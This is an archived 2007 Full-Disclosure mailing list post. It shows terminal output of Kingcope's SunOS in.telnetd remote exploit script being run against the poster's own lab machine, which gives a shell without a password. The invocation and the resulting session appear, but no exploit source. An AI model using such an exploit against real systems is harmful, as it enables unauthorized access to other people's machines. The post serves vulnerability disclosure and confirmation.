OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: [Full-disclosure] "0day was the case that they gave me"

From: Andrea Purificato - bunker (bunkerfastwebnet.it)
Date: Sun Feb 11 2007 - 04:15:21 CST


Alle 07:00, domenica 11 febbraio 2007, Tyop? ha scritto:

> Ok. Someone have a Sol10?

(11:10) bunkersyn:~$ sh test.sh

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcopegmx.net
 ./sunos <host> <account>
 ./sunos localhost bin

(11:11) bunkersyn:~$ sh test.sh sparclab bunker

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcopegmx.net

 ALEX ALEX

 Trying 23.255.212.138...
 Connected to sparclab.
 Escape character is '^]'.
 Last login: Sun Feb 11 11:08:21 from syn
 Sun Microsystems Inc. SunOS 5.11 snv_49 October 2007

(11:09) bunkersparclab:~$ uname -a; id;
 SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10
 uid=100(bunker) gid=1(other)

(11:09) bunkersparclab:~$ exit
 logout
 Connection closed by foreign host.

Absolutely disarming!
--
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.

http://rawlab.mindcreations.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/